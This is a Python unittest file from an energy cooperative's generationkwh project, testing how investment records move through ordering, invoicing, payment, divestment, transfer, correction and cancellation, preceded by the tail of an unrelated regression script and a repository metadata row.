in zip(pred_scores, Y_possible)]
if __name__ == '__main__':
X = np.arange(10)[:, np.newaxis]
Y = [[4, 7], [1, 3], [2, 4], [8, 15], [5, 6], [1, 2], [10, 11],
[10, 12], [10, 13], [10, 14]]
from sklearn.cross_validation import KFold, cross_val_score
from sklearn.utils import shuffle
X, Y = shuffle(X, Y, random_state=0)
print cross_val_score(IntervalLogisticRegression(C=1.0),
X, Y, cv=KFold(len(X), n_folds=3))
| bsd-2-clause | 3,683,267,477,776,859,000 | 37.0125 | 93 | 0.598652 | false |
Som-Energia/somenergia-generationkwh | generationkwh/investmentstate_test.py | 1 | 48119 | # -*- coding: utf-8 -*-
from .investmentstate import (
InvestmentState,
InvestmentStateError as StateError,
forceUnicode,
GenerationkwhState,
AportacionsState
)
import unittest
from yamlns import namespace as ns
from .isodates import isodate
from .testutils import assertNsEqual
class InvestmentState_Test(unittest.TestCase):
user = "MyUser"
timestamp = "2000-01-01 00:00:00.123435"
logprefix = "[{} {}] ".format(timestamp, user)
assertNsEqual = assertNsEqual
def assertExceptionMessage(self, e, text):
self.assertEqual(forceUnicode(e.args[0]), text)
def setUp(self):
self.maxDiff = None
def setupInvestment(self, **kwds):
if kwds and 'log' not in kwds:
kwds.update(log = "previous log\n")
if kwds and 'actions_log' not in kwds:
kwds.update(actions_log = "actions: []")
return GenerationkwhState(self.user, self.timestamp, **kwds)
def assertChangesEqual(self, inv, attr,
expectedlog=None, noPreviousLog=False):
changes=ns(inv.changed())
log = changes.pop('log','')
actions = changes.pop('actions_log','actions: []')
self.assertNsEqual(changes, attr)
if expectedlog is None: return
self.assertMultiLineEqual(log,
self.logprefix + expectedlog +
("" if noPreviousLog else u"previous log\n")
)
def assertLogEquals(self, log, expected):
for x in log.splitlines():
self.assertRegexpMatches(x,
u'\\[\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}.\\d+ [^]]+\\] .*',
u"Linia de log con formato no estandard"
)
logContent = ''.join(
x.split('] ')[1]+'\n'
for x in log.splitlines()
if u'] ' in x
)
self.assertMultiLineEqual(logContent, expected)
def assertActionsEqual(self, inv, expected):
actions = ns.loads(inv.changed().get('actions_log','actions: []'))
lastAction = actions.actions[-1] if actions and actions.actions else {}
self.assertNsEqual(lastAction, expected)
# Infrastructure tests
def test_changes_by_default_noChange(self):
inv = self.setupInvestment()
self.assertNsEqual(inv.changed(), """\
{}
""")
def test_init_withBadParams(self):
with self.assertRaises(StateError) as ctx:
self.setupInvestment(
badParameter = 'value',
)
self.assertExceptionMessage(ctx.exception,
"Investments have no 'badParameter' attribute")
def test_getattr(self):
inv = self.setupInvestment(
nominal_amount = 100,
)
self.assertEqual(inv.nominal_amount, 100)
def test_getattr_badattr(self):
inv = self.setupInvestment(
nominal_amount = 100,
)
with self.assertRaises(AttributeError) as ctx:
inv.badattrib
self.assertExceptionMessage(ctx.exception,
"badattrib")
def test_setattr_fails(self):
inv = self.setupInvestment(
nominal_amount = 100,
)
with self.assertRaises(AttributeError) as ctx:
inv.nominal_amount = 5
self.assertExceptionMessage(ctx.exception,
"nominal_amount")
def test_values_takesInitialValues(self):
inv = self.setupInvestment(
name = "GKWH00069",
log = 'my log',
)
self.assertNsEqual(inv.values(), """
name: GKWH00069
log: my log
actions_log: 'actions: []'
""")
def test_values_avoidsAliasing(self):
inv = self.setupInvestment(
name = "GKWH00069",
log = 'my log',
)
values = inv.values()
values.newAttribute = 'value'
self.assertNsEqual(inv.values(), """
name: GKWH00069
log: my log
actions_log: 'actions: []'
""")
def test_values_mergesChanges(self):
inv = self.setupInvestment(
name = "GKWH00069",
nominal_amount = 200.,
purchase_date = False,
log = 'my log',
draft=True,
)
inv.correct(
from_amount= 200.0,
to_amount = 300.0,
)
values = inv.values()
values.pop('actions_log')
self.assertNsEqual(values, """
name: GKWH00069
nominal_amount: 300.0
paid_amount: 0.0
purchase_date: False
draft: True
log: '[2000-01-01 00:00:00.123435 MyUser] CORRECTED: Quantitat canviada abans del
pagament de 200.0 € a 300.0 €
my log'
""")
def test_erpChanges(self):
inv = self.setupInvestment(log='previous value\n')
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
name = 'GKWH00069',
order_date = isodate('2000-01-01'),
purchase_date = isodate('2000-01-02'),
first_effective_date = isodate('2000-01-03'),
last_effective_date = isodate('2000-01-04'),
active = False,
)
changes=inv.erpChanges()
log = changes.pop('log')
actions = changes.pop('actions_log')
self.assertNsEqual(changes, """\
name: GKWH00069
order_date: 2000-01-01
purchase_date: 2000-01-02
first_effective_date: 2000-01-03
last_effective_date: 2000-01-04
active: False
""")
self.assertMultiLineEqual(log,
self.logprefix +
u"PACT: Pacte amb l'inversor. "
"active: False, first_effective_date: 2000-01-03, last_effective_date: 2000-01-04, name: GKWH00069, order_date: 2000-01-01, purchase_date: 2000-01-02 "
"Motiu: lo dice el jefe\n"
u"previous value\n")
def test_erpChanges_changingAmounts(self):
inv = self.setupInvestment(
nominal_amount = 100,
purchase_date=False,
draft=True,
)
inv.correct(
from_amount = 100,
to_amount = 200,
)
changes=inv.erpChanges()
log = changes.pop('log')
actions = changes.pop('actions_log')
self.assertNsEqual(changes, """\
nominal_amount: 200
nshares: 2
""")
def test_erpChanges_clearsPaidAmount(self):
inv = self.setupInvestment(
nominal_amount = 100,
paid_amount = 0,
draft = False,
)
inv.pay(
date = isodate('2016-05-01'),
amount = 100,
move_line_id = 666,
)
changes=inv.erpChanges()
log = changes.pop('log')
actions = changes.pop('actions_log')
self.assertNsEqual(changes, """\
#paid_amount: 100 # Excpect this one to be removed
purchase_date: 2016-05-01
first_effective_date: 2017-05-01
last_effective_date: 2041-05-01
""")
def test_addAction_firstAction(self):
inv = InvestmentState(self.user, self.timestamp)
actions = inv.addAction(
param = 'value'
)
self.assertNsEqual(actions, """
actions:
- timestamp: '{0.timestamp}'
user: {0.user}
param: value
""".format(self))
def test_addAction_secondAction(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = """
actions:
- timestamp: 'asdafs'
user: Fulanito
param1: value1
""",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- timestamp: 'asdafs'
user: Fulanito
param1: value1
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_unparseable(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = " : badcontent",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: " : badcontent"
type: unparseable
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_notADict(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = "badcontent",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: "badcontent"
type: badcontent
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_badRootKey(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = "badroot: lala",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: "badroot: lala"
type: badroot
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_notInnerList(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = "actions: notalist",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: "actions: notalist"
type: badcontent
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
# Helper and getter tests
def test_fistEffectiveDate(self):
self.assertEqual(isodate('2017-04-28'),
InvestmentState.firstEffectiveDate(isodate('2016-04-28')))
def test_fistEffectiveDate_pioners(self):
self.assertEqual(isodate('2017-03-28'),
InvestmentState.firstEffectiveDate(isodate('2016-04-27')))
@unittest.skip("First investment didn't take into account bisixtile year")
def test_fistEffectiveDate_bisextile(self):
self.assertEqual(isodate('2021-01-28'),
InvestmentState.firstEffectiveDate(isodate('2020-01-28')))
def test_hasEffectivePeriod_whenUnstarted(self):
result = InvestmentState.hasEffectivePeriod(
first_date = None,
last_date = isodate('2018-01-01'),
)
self.assertEqual(result, False)
def test_hasEffectivePeriod_whenUnfinished(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-01'),
last_date = None,
)
self.assertEqual(result, True)
def test_hasEffectivePeriod_whenSameDay(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-01'),
last_date = isodate('2018-01-01'),
)
self.assertEqual(result, True)
def test_hasEffectivePeriod_whenOrdered(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-01'),
last_date = isodate('2018-02-01'),
)
self.assertEqual(result, True)
def test_hasEffectivePeriod_whenCrossed(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-02'),
last_date = isodate('2018-01-01'),
)
self.assertEqual(result, False)
def pendingAmortizations(self, purchase_date, current_date, investment_amount, amortized_amount):
inv = self.setupInvestment(
purchase_date=purchase_date and isodate(purchase_date),
nominal_amount=investment_amount,
amortized_amount=amortized_amount,
)
return inv.pendingAmortizations(isodate(current_date))
def test_pendingAmortizations_unpaid(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date=False,
current_date='2002-01-01',
investment_amount=1000,
amortized_amount=0,
), [
])
def test_pendingAmortizations_justFirstAmortization(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2002-01-01',
investment_amount=1000,
amortized_amount=0,
), [
(1, 24, '2002-01-01', 40),
])
def test_pendingAmortizations_justBeforeFirstOne(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2001-12-31',
investment_amount=1000,
amortized_amount=0,
), [])
def test_pendingAmortizations_justSecondOne(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2003-01-01',
investment_amount=1000,
amortized_amount=0,
), [
(1, 24, '2002-01-01', 40),
(2, 24, '2003-01-01', 40),
])
def test_pendingAmortizations_alreadyAmortized(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2003-01-01',
investment_amount=1000,
amortized_amount=40,
), [
(2, 24, '2003-01-01', 40),
])
def test_pendingAmortizations_lastDouble(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2025-01-01',
investment_amount=1000,
amortized_amount=920,
), [
(24, 24, '2025-01-01', 80),
])
def test_pendingAmortizations_allDone(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2050-01-01',
investment_amount=1000,
amortized_amount=1000,
), [
])
def test_pendingAmortizations_allPending(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2040-01-01',
investment_amount=1000,
amortized_amount=0,
), [
( 1, 24, '2002-01-01', 40),
( 2, 24, '2003-01-01', 40),
( 3, 24, '2004-01-01', 40),
( 4, 24, '2005-01-01', 40),
( 5, 24, '2006-01-01', 40),
( 6, 24, '2007-01-01', 40),
( 7, 24, '2008-01-01', 40),
( 8, 24, '2009-01-01', 40),
( 9, 24, '2010-01-01', 40),
(10, 24, '2011-01-01', 40),
(11, 24, '2012-01-01', 40),
(12, 24, '2013-01-01', 40),
(13, 24, '2014-01-01', 40),
(14, 24, '2015-01-01', 40),
(15, 24, '2016-01-01', 40),
(16, 24, '2017-01-01', 40),
(17, 24, '2018-01-01', 40),
(18, 24, '2019-01-01', 40),
(19, 24, '2020-01-01', 40),
(20, 24, '2021-01-01', 40),
(21, 24, '2022-01-01', 40),
(22, 24, '2023-01-01', 40),
(23, 24, '2024-01-01', 40),
(24, 24, '2025-01-01', 80),
])
# Public actions tests
def test_order(self):
inv = self.setupInvestment()
inv.order(
name = 'GKWH00069',
date = isodate('2000-01-01'),
ip = '8.8.8.8',
amount = 300.0,
iban = 'ES7712341234161234567890',
)
changes=inv.changed()
log = changes.pop('log')
self.assertChangesEqual(inv, """\
name: GKWH00069
order_date: 2000-01-01
purchase_date: null
first_effective_date: null
last_effective_date: null
active: True
nominal_amount: 300.0
amortized_amount: 0.0
paid_amount: 0.0
draft: True
""")
self.assertMultiLineEqual(log,
self.logprefix + u"ORDER: "
u"Formulari omplert des de la IP 8.8.8.8, "
u"Quantitat: 300 €, IBAN: ES7712341234161234567890\n")
self.assertActionsEqual(inv, u"""
type: order
user: {user}
timestamp: '{timestamp}'
amount: 300.0
ip: 8.8.8.8
iban: ES7712341234161234567890
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_order_withNoIban(self):
inv = self.setupInvestment()
inv.order(
name = 'GKWH00069',
date = isodate('2000-01-01'),
ip = '8.8.8.8',
amount = 300.0,
iban = '', # This changes
)
changes=inv.changed()
log = changes.pop('log','')
self.assertChangesEqual(inv, """\
name: GKWH00069
order_date: 2000-01-01
purchase_date: null
first_effective_date: null
last_effective_date: null
active: True
nominal_amount: 300.0
amortized_amount: 0.0
paid_amount: 0.0
draft: True
""")
self.assertMultiLineEqual(log,
self.logprefix + u"ORDER: "
u"Formulari omplert des de la IP 8.8.8.8, "
u"Quantitat: 300 €, IBAN: None\n")
self.assertActionsEqual(inv, u"""
type: order
user: {user}
timestamp: '{timestamp}'
amount: 300.0
ip: 8.8.8.8
iban: null
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_invoice(self):
inv = self.setupInvestment(
draft = True,
)
inv.invoice()
self.assertChangesEqual(inv, """\
draft: false
""",
u"INVOICED: Facturada i remesada\n"
)
self.assertActionsEqual(inv, u"""
type: invoice
user: {user}
timestamp: '{timestamp}'
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_invoice_notDraft(self):
inv = self.setupInvestment(
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.invoice()
self.assertExceptionMessage(ctx.exception,
"Already invoiced")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log Error
)
def test_pay(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
)
inv.pay(
date = isodate('2016-05-01'),
amount = 300.0,
move_line_id = 666,
)
self.assertChangesEqual(inv, """\
purchase_date: 2016-05-01
first_effective_date: 2017-05-01
last_effective_date: 2041-05-01
paid_amount: 300.0
""",
u"PAID: Pagament de 300 € efectuat "
u"[666]\n"
)
self.assertActionsEqual(inv, u"""
type: pay
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_pay_alreadyPaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = '2000-01-01',
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.pay(
date = isodate('2016-05-01'),
amount = 300.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Already paid")
self.assertChangesEqual(inv, """\
paid_amount: 600.0
""",
# TODO: Log the error!
u"PAID: Pagament de 300 € efectuat "
u"[666]\n"
)
def test_pay_wrongAmount(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.pay(
date = isodate('2016-05-01'),
amount = 400.0, # Wrong!
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Wrong payment, expected 300.0, given 400.0")
self.assertChangesEqual(inv, """\
paid_amount: 400.0
""",
# TODO: Log the error!
u"PAID: Pagament de 400 € efectuat "
u"[666]\n"
)
def test_pay_draft(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = True, # Wrong!!
)
with self.assertRaises(StateError) as ctx:
inv.pay(
date = isodate('2016-05-01'),
amount = 300.0, # Wrong!
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Not invoiced yet")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
def test_unpay(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = '2000-01-01',
draft = False,
)
inv.unpay(
amount = 300.0,
move_line_id = 666,
)
self.assertChangesEqual(inv, """\
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0.0
""",
u"UNPAID: Devolució del pagament de 300.0 € [666]\n"
)
self.assertActionsEqual(inv, u"""
type: unpay
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_unpay_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.unpay(
amount = 300.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"No pending amount to unpay")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
def test_unpay_wrongAmount(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = '2000-01-01',
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.unpay(
amount = 200.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Unpaying wrong amount, was 200.0 expected 300.0")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
def test_unpay_draft(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = True,
)
with self.assertRaises(StateError) as ctx:
inv.unpay(
amount = 300.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Not invoiced yet")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
# TODO: unpay effective
def test_divest_effective(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 0.0,
purchase_date = isodate("2000-01-01"),
first_effective_date = isodate("2000-01-01"),
last_effective_date = isodate("2024-01-01"),
draft = False,
)
inv.divest(
date = isodate("2001-08-01"),
move_line_id = 666,
amount = 300.,
)
self.assertChangesEqual(inv, """\
last_effective_date: 2001-08-01
active: True
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTED: Desinversió total, tornats 300.0 € [666]\n'
)
self.assertActionsEqual(inv, u"""
type: divest
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2001-08-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_divest_beforeEffectiveDate(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = isodate("2001-01-01"),
amortized_amount = 0.0,
first_effective_date = isodate("2001-01-01"),
last_effective_date = isodate("2025-01-01"),
draft = False,
)
inv.divest(
date = isodate("2000-08-01"),
move_line_id = 666,
amount = 300.,
)
self.assertChangesEqual(inv, """\
last_effective_date: 2000-08-01
active: False
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTED: Desinversió total, tornats 300.0 € [666]\n'
)
self.assertActionsEqual(inv, u"""
type: divest
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2000-08-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_divest_amortized(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 12.0,
purchase_date = isodate("2000-01-01"),
first_effective_date = isodate("2000-01-01"),
last_effective_date = isodate("2024-01-01"),
draft = False,
)
inv.divest(
date = isodate("2001-08-01"),
move_line_id = 666,
amount = 288.,
)
self.assertChangesEqual(inv, """\
last_effective_date: 2001-08-01
active: True
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTED: Desinversió total, tornats 288.0 € [666]\n'
)
self.assertActionsEqual(inv, u"""
type: divest
user: {user}
timestamp: '{timestamp}'
amount: 288.0
move_line_id: 666
date: 2001-08-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_divest_amortizedRequiresUnamortizedAmount(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 12.0,
purchase_date = isodate("2000-01-01"),
first_effective_date = isodate("2001-01-01"),
last_effective_date = isodate("2025-01-01"),
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.divest(
date = isodate("2000-08-01"),
amount = 300.,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
u"Divesting wrong amount, tried 300.0 €, unamortized 288.0 €")
def test_divest_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 0.0,
purchase_date = False,
first_effective_date = False,
last_effective_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.divest(
date = isodate("2000-08-01"),
amount = 300.,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
u"Paid amount after divestment should be 0 but was -300.0 €")
def test_emitTransfer(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
draft = False,
)
inv.emitTransfer(
date = isodate("2006-08-01"),
move_line_id = 666,
to_name = "GKWH00069",
to_partner_name = "Palotes, Perico",
amount = 300.0,
)
self.assertChangesEqual(inv, """
last_effective_date: 2006-08-01
active: True
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTEDBYTRANSFER: Traspas cap a '
u'Palotes, Perico amb codi GKWH00069 [666]\n'
)
self.assertActionsEqual(inv, u"""
type: transferout
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2006-08-01
toinvestment: GKWH00069
topartner: Palotes, Perico
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_emitTransfer_beforeEffectiveDate(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
draft = False,
)
inv.emitTransfer(
date = isodate("2000-08-01"),
move_line_id = 666,
to_name = "GKWH00069",
to_partner_name = "Palotes, Perico",
amount = 300.0,
)
self.assertChangesEqual(inv, """
last_effective_date: 2000-08-01
active: False
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTEDBYTRANSFER: Traspas cap a '
u'Palotes, Perico amb codi GKWH00069 [666]\n'
)
self.assertActionsEqual(inv, u"""
type: transferout
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2000-08-01
toinvestment: GKWH00069
topartner: Palotes, Perico
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_emitTransfer_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
order_date = isodate("2000-01-01"),
purchase_date = False,
first_effective_date = False,
last_effective_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.emitTransfer(
date = isodate("2000-08-01"),
move_line_id = 666,
to_name = "GKWH00069",
to_partner_name = "Palotes, Perico",
amount = 300.0,
)
self.assertExceptionMessage(ctx.exception,
"Only paid investments can be transferred")
self.assertChangesEqual(inv, """
{}
"""
# TODO: Log the error!
)
def test_receiveTransfer(self):
inv = self.setupInvestment()
origin = self.setupInvestment(
name = "GKWH00069",
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
amortized_amount = 0.0,
draft = False,
)
inv.receiveTransfer(
name = 'GKWH00666',
date = isodate("2001-01-02"),
move_line_id = 666,
amount = 300.0,
origin=origin,
origin_partner_name = "Palotes, Perico",
)
self.assertChangesEqual(inv, """
name: GKWH00666
order_date: 2000-01-01 # Same as origin
purchase_date: 2000-01-02 # Same as origin
first_effective_date: 2001-01-03 # Next day of the transaction date
last_effective_date: 2025-01-02 # Same as origin
active: True
paid_amount: 300.0
nominal_amount: 300.0
amortized_amount: 0.0
draft: false
""",
u'CREATEDBYTRANSFER: Creada per traspàs de '
u'GKWH00069 a nom de Palotes, Perico [666]\n',
noPreviousLog=True,
)
self.assertActionsEqual(inv, u"""
type: transferin
user: {user}
timestamp: '{timestamp}'
date: 2001-01-02
frominvestment: GKWH00069
frompartner: Palotes, Perico
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_receiveTransfer_beforeEffectiveDate(self):
origin = self.setupInvestment(
name = "GKWH00069",
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
amortized_amount = 0.0,
draft = False,
)
inv = self.setupInvestment()
inv.receiveTransfer(
name = 'GKWH00666',
date = isodate("2000-08-01"),
move_line_id = 666,
amount = 300.0,
origin = origin,
origin_partner_name = "Palotes, Perico",
)
self.assertChangesEqual(inv, """
name: GKWH00666
order_date: 2000-01-01
purchase_date: 2000-01-02
first_effective_date: 2001-01-02
last_effective_date: 2025-01-02
active: True
paid_amount: 300.0
nominal_amount: 300.0
amortized_amount: 0.0
draft: False
""",
u'CREATEDBYTRANSFER: Creada per traspàs de '
u'GKWH00069 a nom de Palotes, Perico [666]\n',
noPreviousLog=True,
)
self.assertActionsEqual(inv, u"""
type: transferin
user: {user}
timestamp: '{timestamp}'
date: 2000-08-01
frominvestment: GKWH00069
frompartner: Palotes, Perico
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_receiveTransfer_unpaid(self):
origin = self.setupInvestment(
name = "GKWH00069",
order_date = isodate("2000-01-01"),
purchase_date = False,
first_effective_date = False,
last_effective_date = False,
draft = False,
)
inv = self.setupInvestment()
with self.assertRaises(StateError) as ctx:
inv.receiveTransfer(
name = 'GKWH00666',
date = isodate("2000-08-01"),
move_line_id = 666,
amount = 300.0,
origin = origin,
origin_partner_name = "Palotes, Perico",
)
self.assertExceptionMessage(ctx.exception,
"Only paid investments can be transferred")
self.assertChangesEqual(inv, """
{}
""",
# TODO: Log error
)
def test_pact_singleParam(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
)
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
first_effective_date = isodate('2001-02-02'),
)
self.assertChangesEqual(inv, """\
first_effective_date: 2001-02-02
""",
u"PACT: Pacte amb l'inversor. "
u"first_effective_date: 2001-02-02"
u" Motiu: lo dice el jefe\n"
)
self.assertActionsEqual(inv, u"""
type: pact
user: {user}
timestamp: '{timestamp}'
date: 2016-05-01
comment: lo dice el jefe
first_effective_date: 2001-02-02
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_pact_manyParams(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
)
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
first_effective_date = isodate('2001-02-02'),
last_effective_date = isodate('2001-02-04'),
)
self.assertChangesEqual(inv, """\
first_effective_date: 2001-02-02
last_effective_date: 2001-02-04
""",
u"PACT: Pacte amb l'inversor. "
u"first_effective_date: 2001-02-02, last_effective_date: 2001-02-04"
u" Motiu: lo dice el jefe\n"
)
self.assertActionsEqual(inv, u"""
type: pact
user: {user}
timestamp: '{timestamp}'
date: 2016-05-01
comment: lo dice el jefe
first_effective_date: 2001-02-02
last_effective_date: 2001-02-04
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_pact_badParams(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
)
with self.assertRaises(StateError) as ctx:
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
badparam = 'value',
)
self.assertExceptionMessage(ctx.exception,
"Bad parameter changed in pact 'badparam'")
# TODO: PORAKI
def test_correct(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = False,
)
inv.correct(
from_amount= 200.0,
to_amount = 300.0,
)
self.assertChangesEqual(inv, """\
nominal_amount: 300.0
""",
u"CORRECTED: Quantitat canviada abans del pagament de 200.0 € a 300.0 €\n"
)
self.assertActionsEqual(inv, u"""
type: correct
user: {user}
timestamp: '{timestamp}'
oldamount: 200.0
newamount: 300.0
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_correct_badFromAmount(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = False,
)
with self.assertRaises(StateError) as ctx:
inv.correct(
from_amount= 100.0,
to_amount = 300.0,
)
self.assertExceptionMessage(ctx.exception,
"Correction not matching the 'from' amount")
# TODO: Not enough, also if it has unpaid invoices
def test_correct_alreadyPaid(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = isodate('2000-01-01'),
)
with self.assertRaises(StateError) as ctx:
inv.correct(
from_amount= 200.0,
to_amount = 300.0,
)
self.assertExceptionMessage(ctx.exception,
"Correction can not be done with paid investments")
def test_partial(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = isodate('2000-01-01'),
)
inv.partial(
amount= 100.0,
move_line_id = 666,
)
self.assertChangesEqual(inv, """\
nominal_amount: 200.0
paid_amount: 200.0
""",
u"PARTIAL: Desinversió parcial de -100.0 €, en queden 200.0 € [666]\n"
)
self.assertActionsEqual(inv, u"""
type: partial
user: {user}
timestamp: '{timestamp}'
amount: 100.0
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_partial_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
)
with self.assertRaises(StateError) as ctx:
inv.partial(
amount= 100.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Partial divestment can be only applied to paid investments, "
"try 'correct'")
def test_cancel_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 200.0,
purchase_date = False,
active = True,
)
inv.cancel()
self.assertChangesEqual(inv, """
active: False
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0
""",
u'CANCEL: La inversió ha estat cancel·lada\n'
)
self.assertActionsEqual(inv, u"""
type: cancel
user: {user}
timestamp: '{timestamp}'
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_cancel_draft(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = True,
active = True,
)
inv.cancel()
self.assertChangesEqual(inv, """
active: False
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0
""",
u'CANCEL: La inversió ha estat cancel·lada\n'
)
